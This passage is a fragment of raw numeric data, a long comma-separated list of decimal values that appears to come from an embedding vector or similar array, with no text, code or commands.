5703,0.018969141,-0.024249792,0.003295288,0.010757168,0.008454031,0.013911187,0.025785888,-0.035646163,-0.0142121585,-0.00135119,-0.010939911,0.020730298,-0.0010432455,0.0059022773,0.0042399177,-0.0010770401,-0.015082957,-0.014329848,-0.01233913,-0.0044055926,0.0041381684,0.016151926,0.005897243,0.008938383,-0.0059997444,-0.021152621,-0.013637854,0.0150535535,-0.04383097,-0.027496707,0.018530114,0.029875861,0.0062795985,0.018970102,-0.020018278,0.01928161,0.026331961,0.002168211,0.0073611923,-0.017923474,0.0038501907,0.031217214,0.023745367,-0.028232386,-0.031075101,-0.015637437,0.009362247,-0.004869551,0.0135815665,0.00542476,-0.013643614,-0.016204353,-0.01924518,0.0012170007,-0.020001141,-0.0060277106,-0.0061040726,-0.03125748,0.03482921,-0.020490011,0.011769494,0.008174826,0.01154805,0.009636102,-0.017073419,0.014032754,-0.031547032,-0.016894717,0.022051943,-0.01078848,0.020919053,0.007821237,-0.030584937,-0.021185094,-0.035790216,-0.001658591,-0.026193919,0.015310779,0.0019518886,-0.01118544,-0.027719934,0.02081124,-0.009612098,0.00066361815,-0.030319123,-0.0021899284,-0.012337819,-0.0108535765,0.014359742,0.012105864,-0.04065767,0.019153442,0.0020743893,-0.024663892,0.024033751,0.0019078308,0.0021036754,-0.0055599734,0.0063915094,0.0005647095,-0.013674407,0.024831075,-0.019234888,0.014039662,0.025710953,0.0001864548,0.010008107,0.005687864,-0.01832657,-0.016908865,0.016477626,0.010954038,-0.01519794,0.00071457773,-0.0041925856,-0.0062839203,0.0028404866,-0.013944875,0.036416423,-0.0017440466,-0.0033791033,0.03730417,0.008960111,-0.02818546,0.0024703653,0.0040856875,-0.0007309078,-0.0007024475,0.008775412,-0.01749393,0.035227805,0.035146426,-0.009369564,-0.008916063,0.026917137,-0.015444622,0.0009969863,0.013480509,-0.009225367,-0.009079955,-0.023261415,0.01834741,-0.027937211,-0.02469619,-0.013830308,-0.010656908,0.010674111,-0.012048812,-0.0024857412,-0.0017436256,-0.0030942252,0.024806067,-0.0056978357,-0.006760569,0.00082027167,0.008161028,-0.026631393,0.0068401783,0.009444285,-0.0012672505,0.0015129307,0.002869253,-0.003841842,-0.011138375,0.0064208778,-0.007948836,-0.013504115,0.009949429,-0.0044943807,-0.0031001132,0.020052966,-0.011898298,0.025041021,0.016368568,0.0014383147,0.013071666,-0.020426782,-0.022828907,0.0059450883,-0.00455897,-0.030099502,-0.00760889,0.021510294,0.015350973,-0.018532636,0.00006502249,-0.0038843243,-0.048813526,0.028176686,-0.020951217,-0.022238396,0.006633103,0.0031614807,0.015390205,0.016499938,0.023468008,-0.013812997,0.01045556,0.011723258,0.0283375,0.016136106,-0.004739914,-0.009848591,-0.014581415,0.0035567614,0.021353789,0.011454814,-0.0072652753,-0.0010172256,0.0009078892,-0.008284584,0.022644922,0.0077108694,-0.001919852,-0.0009844686,-0.036191486,0.0072452733,0.005072776,0.013051461,0.0062328293,-0.009656066,-0.027554462,-0.0061569368,0.013090367,0.010089033,-0.010941621,-0.0017288639,-0.0027281817,-0.017779816,-0.0009957934,0.028510418,-0.0033263594,-0.02102581,0.02366447,-0.017278284,-0.0037093563,-0.0074954634,0.0350497,0.0023749347,-0.003352765,0.018070173,-0.017646039,0.025064027,0.00071422185,0.017985266,0.008984757,0.003684062,-0.0019761275,0.0044719,0.0250092,0.008305817,-0.020643061,-0.017505439,0.00022951295,0.03848185,-0.022346677,-0.007757956,-0.023089165,-0.0053541004,-0.020490844,-0.01629656,-0.040962633,0.018626854,-0.0036887086,-0.010531965,-0.0023778658,0.003914444,-0.008997554,0.009129597,-0.025429204,-0.009976317,-0.039303634,-0.014991869,-0.0036438787,0.011959837,-0.009873907,-0.025058249,-0.0109256385,0.0018222233,0.0011042451,0.013626244,-0.004812219,0.030512027,-0.007046246,-0.0061687957,-0.004585686,-0.0018580635,0.020620054,0.00027446917,-0.0028568492,0.06396124,-0.008320892,0.0009384117,0.015272885,-0.0008555895,0.038541462,0.02265014,-0.0076720472,0.0082448665,-0.01870006,0.03419979,0.007971163,0.0011573056,-0.017533395,-0.0026148905,0.024724592,0.027492065,0.000985894,-0.014018305,0.029677136,0.00669953,0.016797243,-0.0028529582,0.017933868,-0.0021936297,-0.018825872,-0.015258038,0.0009973673,0.0077895722,0.0061964514,-0.02009215,0.035299305,0.017286083,-0.010228003,-0.028592363,-0.013577965,0.0058451104,-0.014996524,-0.0005390343,-0.023583606,0.009606097,0.012338884,-0.02402243,0.00013677042,0.00908458,-0.0102456985,0.026088074,-0.0087839095,0.0014810222,0.0038936934,0.01057732,0.009569992,-0.001623674,0.0045626736,-0.005436543,-0.0023006338,0.015491359,-0.017318567,-0.02388411,-0.0048388415,0.002123285,-0.020710086,0.019731293,-0.010310533,0.00040171135,-0.017466785,-0.0012924542,0.0046156636,0.0016019074,-0.005573933,0.036204193,-0.0028929366,-0.022956822,0.03031278,0.024617195,0.004517774,0.017040337,-0.0039733527,0.029197874,0.016412828,-0.014459069,0.017955495,-0.0071530472,0.0016230657,-0.024104489,-0.01878559,-0.012763996,-0.01719465,-0.0037391647,0.008690335,-0.00053420867,-0.019389326,0.039110564,-0.014141316,0.015614196,0.006971727,-0.008147088,-0.0057056933,0.020136725,0.012239987,0.008636383,-0.027450815,0.027998837,0.013304805,-0.048450705,-0.0014621178,-0.010367014,0.008478913,0.0030588422,-0.0021845498,-0.010325179,-0.021092027,-0.0035694852,-0.013273539,0.008064741,0.026577642,-0.025136083,-0.0030346753,0.039607108,0.013533867,0.006770041,-0.0040534325,-0.016481277,0.02148179,0.0240246,-0.0014214263,-0.007923627,0.037382405,-0.008542621,0.015408769,0.019794192,-0.03487706,-0.0034832468,-0.01113249,0.0066236737,-0.03009004,-0.024453187,-0.004825531,0.017874852,0.0060378984,-0.04171627,-0.008056855,0.028070226,-0.0025744936,-0.005685663,0.0013321296,0.026747432,-0.0016703894,0.008576658,0.016528735,0.017393596,-0.00303026,0.0065129446,-0.021606311,-0.013840202,-0.006783668,-0.01531949,-0.014306225,-0.0011704533,-0.015431219,0.0011943111,0.0039414605,0.008414104,-0.0048227655,0.016854107,0.034627896,0.007929705,0.0008473982,0.0113304155,0.000464864,0.0063148015,0.00093568116,0.00062115537,-0.012268664,-0.0070936754,0.020004248,0.00037662897,0.023410749,0.0033608011,0.0034847045,-0.051118426,0.002244864,0.0142273065,0.01879326,-0.019930584,0.019022373,0.005929284,-0.011895859,-0.04319004,0.012170892,0.009025186,0.019212076,0.0022700573,-0.005232899,0.00015868929,0.0064057787,-0.0024572783,0.076451555,-0.019238597,0.023090208,-0.0035900578,0.018970175,-0.014683388,0.012354474,-0.0021412573,0.031403143,-0.009272873,-0.022160701,-0.023304742,-0.0092748115,-0.0069178487,0.008694694,-0.009030099,-0.009984264,-0.001265764,-0.00544386,0.016484475,0.013254802,0.011397692,-0.004856729,0.0025454322,-0.0006343364,0.018056275,0.013070627,-0.039995067,0.012280643,0.008037163,0.009939245,-0.018876117,-0.0037047635,0.022164779,0.008602129,0.0077256085,0.007972561,-0.0022353265,-0.020525554,0.030930566,0.004467158,-0.007965796,0.029617682,0.00016092721,0.015303772,-0.01651044,-0.0076393923,-0.016901065,-0.00610799,-0.0024595305,0.0061213537,0.0023443617,-0.012056826,0.009749694,-0.029785093,0.02598376,-0.017252743,0.021818401,0.014814206,-0.0015410115,-0.0023048157,0.01730402,-0.002811674,-0.02301363,-0.0051329657,-0.012461679,-0.001379601,-0.020327976,0.016059773,-0.018828262,0.023884738,-0.0072594243,0.011175973,0.0116922725,-0.016112307,0.013134317,0.003542243,-0.012953975,-0.010180023,-0.02554089,-0.0020506578,-0.00897211,0.01838406,0.020556819,-0.007887422,-0.00039148852,0.0025390722,0.009044272,0.07467247,0.016969765,0.011095349,0.0071849776,-0.0026632445,0.020145344,0.015781172,0.02527579,0.0023475955,0.010799296,-0.020387402,0.014382616,0.011640883,0.008186981,0.0037009334,-0.03338099,0.010996047,-0.006213511,-0.0019939526,-0.007018436,-0.009374042,0.043277122,0.0050690677,-0.0021603005,0.009690643,0.011903583,0.002523433,-0.0020681983,-0.005675496,-0.01671401,0.00044129803,0.006884692,0.018324291,-0.006659488,-0.0169029,-0.04173892,-0.004790372,0.12560108,-0.004005908,-0.004102633,0.01116531,-0.0069908197,0.0122838,-0.11083539,0.0031995473,0.011935025,-0.0058875503,0.0034605386,-0.00039964763,-0.007222093,0.014751666,0.013366526,-0.016681243,-0.0097578345,-0.012067015,0.021909956,-0.014537438,-0.018301709,0.00679716,-0.0113468515,0.0022121533,-0.014551923,-0.008037489,0.0049433024,-0.017161358,-0.0136092715,-0.008338811,0.012518466,-0.007539928,0.008608442,0.0037691346,-0.040744577,0.011925454,0.017792193,-0.00059245556,-0.017397776,-0.013639413,0.027406216,0.007464295,-0.024203194,-0.025747906,-0.14482586,0.012271727,-0.006801387,-0.048749823,0.015029247,-0.017064381,-0.0063727945,-0.002323713,0.022573207,0.016723378,-0.017068438,0.015192291,-0.007966853,0.00485472,-0.031947393,-0.017871028,0.0048051826,-0.0056210537,-0.0011947746,0.0016963385,0.015255773,0.002879694,-0.01469652,-0.005527048,-0.022055903,0.0027074553,-0.008483728,0.027376112,0.017375166,-0.0058317133,-0.005815527,0.00601586,-0.019471899,-0.009675548,-0.0014210924,-0.015110467,-0.0037137703,-0.0076959087,-0.011001793,0.029765382,-0.0076021687,-0.012067889,-0.0064256717,-0.0027677887,0.0022061497,0.034716636,0.0030529024,0.001219924,0.02469187,-0.00021527079,0.03244064,-0.011393246,-0.01318993,0.006638231,-0.0050478647,-0.009706119,-0.0041182535,-0.024817165,-0.004217169,0.00094521727,-0.0017502226,-0.027480964,-0.013293197,-0.017659996,0.03849768,0.000736711,0.019144667,-0.01269969,-0.0010824839,0.01204096,-0.009034033,0.0043584164,-0.012701292,-0.012884517,0.013895046,0.012272186,-0.010401834,0.0033298205,0.025018174,-0.024088642,0.017896816,-0.0026749056,0.011607354,-0.024261964,0.015270273,-0.00653498,0.004497748,-0.00534722,-0.01186617,-0.0022690278,0.024443658,-0.009012438,0.017048975,-0.0076845214,0.023118315,0.010033964,0.039069504,-0.013425423,-0.013806608,-0.0018705215,0.011966621,-0.018679552,-0.00943999,-0.00091599015,-0.02626443,0.013576124,0.00068667514,-0.014045887,-0.013680931,0.0029046542,-0.0012998242,-0.021192258,0.019769656,-0.0028924935,-0.02340549,-0.03657618,0.020487145,-0.010634696,0.014221186,-0.023879835,-0.024883091,0.01895227,-0.00965026,-0.0038077023,0.050562166,0.02545369,-0.018271703,-0.008559194,-0.0020896867,0.003973367,-0.018756928,0.0248374,0.0006472931,-0.0063521583,-0.017827298,0.0030204544,-0.00846781,0.020062514,-0.02866339,-0.02119022,-0.0074893343,-0.002072404,-0.010719703,-0.010253376,0.000054877422,-0.01194887,0.03073574,-0.0019940776,0.01598744,-0.010864436,0.0046757474,0.029591728,-0.034400247,-0.022463322,0.021020016,0.0623986,0.0001527441,-0.022616496,0.017947644,-0.00038119385,-0.010430896,0.011787097,-0.021155387,-0.013353032,-0.0071669067,-0.020334205,0.008961246,-0.010390068,0.016653813,-0.01813199,0.003817457,0.013632675,0.016115768,-0.000020977666,0.004745048,0.01371355,-0.0115005635,-0.010773027,0.038126767,-0.0100241145,-0.0073432857,0.024831383,0.020420592,-0.006766038,0.00012189992,-0.015627502,-0.018812245,-0.009858419,0.0010644363,0.009378426,-0.03547193,-0.03231037,0.0010051647,0.009692299,-0.020802086,0.006161494,0.033973522,0.011508021,-0.018451909,0.013969828,-0.014860989,-0.02019366,-0.0031013307,0.018272286,-0.015944866,0.006568368,0.009876628,-0.015745712,-0.02135636,0.018656336,-0.0024003808,0.004425678,-0.016368384,-0.0026013087,-0.0066689467,0.022491757,-0.016170727,-0.027736977,-0.0059457133,-0.0137289185,0.0022444183,-0.024550684,0.0017218398,0.0055930433,0.0008353059,0.00023452482,-0.007226764,-0.03096333,-0.0035254296,-0.0029084322,-0.019666893,-0.014522105,-0.004266513,-0.018135546,0.04059009,0.007502452,0.0184636,-0.011494568,-0.008346915,-0.0051177023,-0.03333117,-0.021807618,0.041782424,-0.01946967,0.0046932134,0.022340998,0.014743677,0.0047881673,-0.0029565701,0.013070252,0.007949235,0.010007102,0.0077706757,0.027255489,-0.0069462257,0.011937391,0.016715828,-0.008640226,-0.006599428,0.00718683,-0.013678754,0.0021470995,0.022394588,0.011563244,-0.0067252824,-0.008426368,-0.010954382,0.009715918,-0.02589883,0.0017692172,0.0347456,-0.012558539,0.022815213,0.02180433,-0.0056095673,-0.02376746,0.001104182,0.0042528897,-0.018541407,0.0011747247,-0.023676552,0.0041326038,0.009250218,-0.027987273,0.02490931,0.0075425985,0.014921252,-0.0021785805,-0.009933561,0.0057761823,-0.0049350336,0.027225636,0.011423238,0.01666511,0.015485589,-0.014874687,-0.021628724,0.0073260367,0.0015796503,-0.0021344568,-0.0023602913,-0.0020958544,-0.0010538502,-0.019207222,0.0021045275,-0.02482713,0.0397238,-0.006080765,0.0036694517,0.00996171,0.0101981675,-0.004201202,-0.020305494,-0.01641968,-0.02901757,-0.0026621495,0.03700194,0.0046218475,-0.010865456,-0.010758342,0.019461576,0.035855714,-0.0089155445,0.019175114,0.001993271,-0.0009784028,-0.013537833,0.0096649015,-0.0019027322,0.0016847518,-0.011220567,-0.0034730565,0.020204559,0.0015260107,-0.020597896,0.01750204,0.007823314,0.001977147,-0.008622046,0.014224302,0.009887748,0.013921342,0.021673156,-0.0041764206,0.029462142,0.0021591692,-0.009434035,0.00006756889,0.013377005,-0.014323467,-0.016858973,0.021969026,-0.00693949,0.010745073,0.010981463,0.008581557,-0.000027604025,-0.02353597,-0.016860854,0.012771505,-0.004559549,-0.011351605,-0.031007301,0.0022779843,-0.009158812,-0.015673745,-0.0036323576,-0.007806727,0.025562609,-0.007230687,-0.025690375,0.003900872,0.026447654,0.0019274111,-0.025630096,0.0060026315,0.0058074007,0.00031984624,0.004303585,-0.0070199748,0.0061910697,-0.019625306,0.06937404,-0.025856216,0.004275663,-0.011748872,0.03072046,0.023295283,-0.0009748478,-0.0032971797,0.0009232494,-0.036505338,-0.0073841056,-0.03690566,0.006872294,-0.009480368,-0.03687764,-0.03356412,0.012641175,-0.0033199217,-0.002285483,-0.0015061282,0.018910985,-0.012898662,0.039734054,0.0032454638,-0.008105741,-0.05010828,-0.021643568,0.011469621,-0.034000024,0.02241692,0.007904497,-0.0154228825,-0.019015403,0.000537651,-0.023987837,0.0027151052,0.000580432,-0.020611672,0.0067897635,0.012397093,0.023124335,-0.00029083865,-0.011275204,0.013195491,-0.008006329,-0.016639162,-0.0016768819,0.0038530796,-0.009953573,0.01731374,-0.022150317,0.01811163,0.024580663,0.011984496,-0.021360222,0.007672271,0.010150414,-0.0067891474,-0.0088877855,-0.003949948,0.018260615,-0.010269293,-0.028098863,-0.0140026705,0.0030580654,0.005489319,-0.028345967,-0.008580363,-0.017019544,-0.010594554,-0.01012512,0.0022128543,-0.0017510862,0.015251408,-0.006666312,-0.013293324,0.024304688,-0.0029369679,-0.0047101956,0.018485643,-0.012059018,0.010108188,-0.000266723,-0.014306424,0.01182756,-0.0000034429813,-0.006220236,0.0029606724,-0.00882554,0.017624158,0.05032808,-0.0028584504,0.0076723285,-0.008241755,-0.0069811344,-0.01013964,-0.010365448,-0.021741519,0.0012655517,-0.022683064,-0.032339472,-0.003599528,-0.01063488,-0.00365344,-0.013466641,0.013828215,-0.103970535,0.008918576,-0.02089185,-0.019315712,-0.010227775,-0.006419197,0.004768918,0.02618849,-0.0021557617,-0.036902193,-0.0016699006,0.01873967,0.0046353093,-0.010962218,-0.00055930804,0.005485133,-0.021703918,-0.015062771,-0.00071227126,0.022842513,0.03184043,-0.019990256,0.00013677093,-0.0023488086,-0.0036409097,0.0000010679593,-0.008660063,0.0027849392,0.0021670172,0.018254973,0.0032874192,0.008554617,0.013151799,0.009731393,0.010880233,0.0092934705,-0.0073080924,0.0011322283,-0.010085052,0.0023781436,-0.0013180408,0.012847919,0.00083819474,0.011060904,0.012516155,-0.004571172,0.0066899825,0.020349657,0.024418065,0.02824712,-0.008911112,-0.0100592915,0.0056702085,-0.009994615,-0.008899212,-0.0101034,0.009771754,0.007882785,0.0004921278,-0.0051210825,-0.024063261,-0.011167779,-0.007012838,-0.00040979328,-0.0052459994,0.014040526,0.003056966,-0.0029112431,-0.03512446,-0.0064704632,-0.0028976484,0.011965128,-0.008151966,0.00097231934,-0.008187045,0.0082892245,0.0060962792,0.007659538,-0.01805801,0.03574652,-0.03195371,-0.0018206177,-0.0044523836,0.041857593,-0.004370726,-0.01944402,0.004510603,0.025257915,-0.016925514,0.011811786,-0.0044392664,0.013589454,-0.0054207714,-0.009924461,-0.01059061,0.020339116,0.0051490306,0.008358864,0.004962976,-0.00037208045,-0.0152742155,0.009738886,-0.0028711066,-0.023361938,-0.11296705,-0.012426184,0.031207131,-0.016142104,0.0048402566,-0.011862649,0.017473483,0.010434234,0.031264286,0.018009258,-0.0034603341,0.022447564,-0.019045513,-0.0040566786,0.0033240109,0.009063575,-0.03124297,0.0048260633,-0.004675098,0.0009627702,0.017801855,-0.010585409,0.00013608356,0.008934947,0.0057468317,0.010012144,0.017492538,0.040473852,0.014138147,-0.015166772,-0.0029641348,0.0038474249,-0.014363748,-0.011597358,-0.022337686,-0.00946755,0.0030987333,-0.009666721,-0.017301038,0.013876662,0.008487298,0.009865874,0.0057695713,0.01755191,-0.0041244873,-0.016841603,0.0045589884,0.026205834,-0.0055556484,-0.013323357,0.0010587493,-0.0009427198,0.0043069664,-0.016177379,-0.014156502,-0.019396799,0.00088229944,0.009543863,0.019622134,-0.0045852377,-0.0014967646,0.01939278,-0.008407248,-0.0006054537,-0.0034776628,-0.0017720644,0.004429671,0.021042092,0.003365886,-0.0017627302,-0.0022943125,0.029143972,0.001766747,-0.010317758,0.027157038,-0.004618262,0.019839048,0.024244262,0.009789978,0.0046779825,0.008922006,-0.02723054,0.0030223597,0.018512422,-0.03193887,0.024575267,0.0020875602,0.0041226917,-0.015128581,0.013815029,0.018774603,0.013113746,-0.000078970595,0.02826725,0.015249641,0.003000785,0.06858042,-0.0027904403,-0.02543105,-0.01666843,-0.013567456,0.00796631,-0.02633505,-0.004806976,-0.018539913,0.020213539,0.020790067,-0.0075267325,0.0043543694,-0.0047714687,0.0009261584,0.017724352,-0.024573669,-0.0058799735,0.012969127,0.009367593,-0.009210253,-0.015605159,0.007188164,0.0052033775,0.013088741,0.0074143186,0.004686374,-0.021824893,0.018929701,-0.02611804,-0.012599009,0.017873917,0.011725899,-0.008822517,-0.0016130684,0.00016858321,0.017927745,-0.0066337916,-0.015290452,0.006280186,-0.0040037585,0.0116894,-0.002490178,0.0017906155,0.0006444093,0.0104887625,0.010407948,-0.0069337715,0.005542108,0.0082222065,-0.009397095,-0.018273143,-0.013902089,0.011107446,-0.0062242527,-0.009319419,0.025883192,0.009076912,0.0049701184,0.0047204345,-0.007901987,0.00866744,0.014071639,0.0133245895,-0.006971941,0.025950938,0.017419368,0.0014839638,-0.0012855578,-0.017504916,-0.0060818014,-0.0041840654,0.009243,0.004937902,-0.006409771,-0.009758275,0.01600016,-0.057064526,0.0039699115,-0.00016589985,0.011879815,0.009202131,0.03512682,0.01111876,-0.009782203,0.009809357,-0.011955609,-0.011393943,0.0093819825,0.019750645,0.0033654536,0.0003987821,0.001147935,-0.010250311,0.024957288,0.01798305,-0.020227356,-0.024329292,-0.0025699157,-0.006919234,0.0029235065,0.024299713,0.009450896,-0.0065695853,-0.010639893,0.010196768,0.009585046,-0.029422965,0.012546012,0.011488767,0.0013992855,0.02354568,0.013587115,-0.015348179,-0.016785944,0.01024819,-0.0041789496,0.009990617,0.0129996035,0.015364578,-0.013958664,-0.014255069,0.013282245,0.0042400067,-0.003322686,-0.025568698,0.00095513,-0.006674693,-0.0041503063,0.017815484,0.02363023,0.030743634,-0.024992958,-0.0063376836,-0.013451726,-0.01366484,-0.019870814,0.0018629399,-0.0056114006,0.004435291,0.022437965,0.0077968393,0.0042514186,0.009598364,0.029522749,0.009027189,0.033328064,0.027703833,0.018545203,-0.007544077,-0.0031941682,0.0012712224,0.00400847,0.03077467,0.0026335306,0.008021101,-0.0010941133,-0.0040107914,-0.0009847572,0.009545795,0.015490296,0.014314557,-0.014701206,0.007732301,-0.02172817,-0.0014434317,-0.01756274,-0.011755086,0.012872767,0.007674198,-0.014549786,-0.026724381,-0.00095077156,-0.0068026413,0.024705676,0.0063131247,0.0026603632,0.024117377,-0.016413078,-0.012744601,-0.000765092,-0.0073367455,0.018465042,0.0056212074,-0.004453893,-0.007239849,-0.0073473086,0.014294449,-0.011717595,0.0016067766,0.013049583,0.002577992,-0.0201935,-0.0017235434,0.007474357,-0.0070262277,-0.0017014908,-0.006956946,0.00084726606,-0.0026846086,0.009846192,0.0033142273,0.0026797995,0.012069167,0.0153038325,-0.015577699,-0.029940505,-0.010185492,0.011710642,-0.012899878,-0.0032237363,0.0076691215,-0.0078501245,-0.015370107,-0.017551811,0.013170848,-0.011705973,0.014673499,0.00038732289,-0.007005749,-0.004303492,0.017009601,-0.03241422,-0.0151521815,-0.0059637832,-0.025808362,0.015856005,-0.01901278,-0.005018839,0.014557949,0.019668667,0.04264366,-0.012506225,-0.008930292,0.016274678,-0.020461472,-0.004114088,0.0037858803,0.023443852,-0.0047189337,0.005764047,0.032205004,-0.015093427,0.010317227,-0.012639439,0.005644172,-0.0060038026,-0.0069217426,0.027434152,0.007296182,0.00008681196,0.0008050148,-0.0073564327,0.0029896642,-0.000059416863,-0.0010215458,-0.004560745,-0.019760171,-0.011558771,0.023532236,-0.026502432,-0.0037956296,0.026270978,0.00061810005,-0.012687678,0.0008558884,-0.014316858,-0.009302626,0.0014711339,-0.0075000767,0.004444884,0.011486078,-0.018469084,-0.009471187,-0.00899787,0.015878446,-0.022182506,-0.02179275,0.0009929456,-0.09969012,-0.000120937126,0.020970987,0.0231138,0.050909325,0.01422686,-0.013777262,-0.02343019,0.008017102,0.007109648,-0.0025036186,-0.015110398,-0.02497649,-0.0019508582,0.030888436,-0.007395786,-0.01335781,0.011467505,-0.0121887,-0.030386575,0.007923883,0.0057132784,-0.014653604,-0.006809325,0.006525435,-0.0016535718,-0.00032898595,-0.0054869177,0.00023643496,0.0036298032,-0.010401576,0.004053514,0.0011304657,-0.003535393,-0.0134158125,0.0013382387,0.0028749548,0.0071029034,-0.021774327,-0.031869162,0.0077648913,0.00819763,0.0012869058,0.0019128248,-0.025882237,0.015947305,-0.028899347,-0.011435174,-0.0078784935,0.0018816763,-0.010290238,-0.0017598164,0.008338221,0.027272535,0.006644121,0.014084905,-0.0007264398,-0.015499599,0.023916397,0.0025714817,-0.011068652,0.00042772366,0.016672386,0.00014146641,-0.0065154433,-0.00887907,0.011106808,0.009215511,0.0016440201,0.007329731,-0.0059173577,-0.045886233,-0.018616334,-0.020851942,-0.0005223024,-0.0010997313,0.011917725,-0.01586018,-0.0057097287,0.011914656,0.008120805,-0.00855523,0.02663787,0.016961029,0.02833199,0.0065920176,0.0041354396,0.0145217385,0.020891104,-0.0036759211,-0.034016714,-0.007349916,0.021215199,-0.0013878873,0.01538103,0.0020713003,-0.014131338,0.010247931,0.008148193,-0.0010545413,0.0035533744,-0.0019068081,-0.0049521127,-0.007967113,-0.022438066,0.00793135,-0.0019331372,-0.0061398367,0.0034110742,-0.011593589,-0.024055922,0.035474557,0.004192876,0.044151966,0.0069638616,0.02485418,-0.012434859,0.012554363,-0.016113823,-0.03608111,-0.0134839965,0.00066516927,-0.012128978,0.025347194,0.015408746,-0.009148062,0.007828005,-0.012260105,-0.014689145,0.022857271,-0.015770726,0.020310784,0.027390568,0.012545998,-0.022644296,-0.007943376,-0.015691986,0.011853228,0.013697218,0.027188174,0.0052698674,-0.02818119,-0.0023704562,-0.00632108,-0.03696697,0.020985153,0.0045955423,-0.0071724816,0.0129240155,-0.0096899,-0.01056649,-0.00425926,-0.009066512,-0.0041226647,0.007934106,0.011529758,-0.0005195184,-0.0080598835,-0.034280054,0.003213562,-0.0047875145,0.013550824,-0.0031135504,-0.012162354,-0.02653436,0.013117815,-0.0059529124,0.010881662,-0.008467827,0.009643357,-0.015870837,-0.0075874403,0.00039116078,-0.003514929,-0.012715833,-0.017759169,0.02310535,0.028488372,-0.0034938424,-0.002104067,-0.020973383,0.009891788,-0.018124709,-0.014388855,-0.005863104,-0.014808031,0.000561587,-0.004368286,0.015819458,-0.0024409369,0.0066263033,-0.000089979025,-0.00265556,-0.0122775715,-0.02768717,-0.010383825,0.005164205,0.002276978,-0.010828379,0.016637484,-0.007576837,0.003998459,-0.024578271,0.018232407,0.0455944,0.023299003,-0.00396921,0.020683205,-0.01560545,0.013437153,-0.01083665,0.008811238,0.0005263419,0.12650967,-0.011594794,-0.0068609663,0.001374933,0.012750786,-0.008977675,0.0324081,0.013883439,-0.010380365,0.0024247977,0.025971029,-0.017606726,0.013083857,-0.009631265,-0.002654775,0.017536337,0.019012423,-0.036206745,0.011591595,0.0041305176,0.01180434,-0.02017457,-0.0123064155,-0.030715737,-0.00028209074,-0.07739725,0.036624953,0.019085214,0.0022664191,0.039060418,0.000320076,-0.0062646423,0.009599726,0.005084211,-0.012773846,0.015467,0.011010146,-0.016156264,-0.0023869064,-0.005162043,0.02130789,0.0074128434,0.0019028824,-0.009359541,-0.015851883,-0.01230282,0.0067539453,-0.005084805,-0.010442707,-0.0038021996,-0.004172078,0.011459337,-0.0035310572,-0.011799086,-0.007507691,-0.021640116,-0.003589805,0.007901832,-0.009208884,-0.0074048066,0.021058623,0.003217941,0.015329676,-0.0004275302,0.01798415,0.0071423342,-0.01228959,0.0067665377,-0.005612069,-0.003578821,0.00087847456,-0.025317429,0.0049369796,-0.008680657,0.008182444,0.012738375,-0.006631984,-0.016937943,0.0029441249,0.005286123,0.008044985,-0.008024313,0.009609738,0.004550075,-0.00026596722,0.00050863496,0.011201786,0.017951531,-0.018423337,-0.0067982506,-0.013988841,0.013199384,0.019517394,0.018994467,-0.013634015,0.0072758016,0.0028703085,-0.0120565025,-0.013838618,0.007479929,-0.01275056,-0.016762577,0.004666387,0.013314665,-0.00081598654,-0.010528939,0.004616424,0.007862021,-0.007765659,0.008921198,-0.00082024554,0.022576725,0.025000779,0.022613477,0.0008777385,0.038398486,-0.039195567,-0.017592506,0.017401198,-0.020115383,-0.0037058836,0.020838344,0.017962454,0.019311663,0.014730095,0.017293671,-0.011668329,-0.015035779,0.004834778,-0.011172778,0.00040965396,-0.036576528,0.006322942,0.029506827,0.00097104284,0.000077669225,0.026442606,0.004416822,0.019816607,-0.0006218307,0.015556382,-0.029070485,-0.010625659,-0.0027564545,0.0028711802,-0.035735905,0.021895193,-0.0033873448,0.013961361,-0.011737072,0.013062978,0.013929171,-0.014444301,0.0046478733,-0.0018895856,-0.014062114,0.0034136914,0.03299243,-0.0016395869,-0.0140016,0.008875482,0.003887942,0.0011270622,-0.049147863,0.026923805,0.009869902,0.009024702,-0.0030673598,-0.010206413,-0.008269676,-0.0048108264,0.00057833566,0.005544663,0.000806297,0.00015467557,0.0026321837,-0.007856535,0.01213259,-0.0030577409,0.0015424794,0.0148121305,-0.008119339,-0.009455214,-0.017903157,0.024658779,-0.006724791,0.009901749,0.010309643,-0.023981193,0.017207853,-0.0015060253,-0.01838019,-0.0060418686,0.008921179,-0.019544192,0.019063117,-0.029523734,0.03120156,-0.008973577,-0.03755631,0.022901049,0.014806953,0.018467493,-0.03303405,0.0005522509,-0.020275664,0.0041575306,-0.016612692,-0.0071913386,-0.0039819167,0.013717068,-0.005615583,-0.00046848573,-0.03798961,0.0020678067,0.010137089,-0.018739216,-0.017303662,-0.0021733202,-0.004804896,-0.017404385,-0.0012376083,0.0033701444,-0.000024674875,-0.006156256,0.01906772,-0.012967825,0.0108887255,0.01985248,-0.019990295,-0.012135591,0.013006304,0.01157447,-0.010271913,-0.02672592,-0.00054538803,0.035834774,0.009181196,-0.0034913658,0.019231224,-0.020449322,-0.0014572205,0.020686833,-0.001614506,-0.015163968,0.013126201,-0.0054996586,-0.0136655355,0.0009910503,-0.013625732,-0.015199095,0.0011538527,-0.0021026987,-0.023562828,-0.032490537,-0.014084317,-0.007779592,0.007074383,-0.0059147,-0.013724149,0.014546595,0.014654403,-0.0012425617,0.011544195,-0.007587465,-0.008203222,-0.011058292,-0.02359438,-0.0052380622,0.012584998,-0.005531115,0.007966365,-0.002021534,0.031999685,0.015951816,0.007799196,-0.003194747,-0.0025498453,0.000975755,0.0033046906,0.017955728,-0.017384032,-0.007807201,-0.04582064,-0.005700076,-0.00473982,-0.0075664422,0.019697543,0.067752525,-0.06307422,-0.009253022,0.023127548,0.00074231875,-0.009921024,0.029484017,0.01678585,-0.023996063,-0.027746806,0.023109457,0.007445268,-0.016961899,-0.03689639,-0.0050841435,0.01877401,-0.012048776,0.016226813,0.009916321,-0.0054501398,-0.017302942,0.0075447084,-0.016535232,0.0014434743,-0.003474774,-0.022487866,0.010967659,-0.012982826,0.012783071,0.0012395123,0.006012764,0.018433297,0.02758513,-0.02065962,-0.0047061075,0.022259038,-0.0049946266,0.015456383,-0.0061618853,-0.031195337,-0.02693013,-0.003858602,-0.002137308,0.0072889463,-0.004029216,-0.0020344122,-0.024193667,0.014059139,-0.010585599,0.12183501,-0.007046893,0.0042432495,0.013430736,-0.0058443826,-0.010086349,0.011254794,0.026245994,0.011028085,0.01325054,0.023414478,-0.0018601086,-0.000045130248,0.04296653,-0.017359355,-0.0113986395,0.015836556,0.1439151,-0.007606272,0.015320923,-0.0038317856,0.007368245,0.0088585485,0.013998457,0.009597796,-0.08184459,-0.0034943714,-0.043271698,-0.01336937,0.0037180057,-0.041984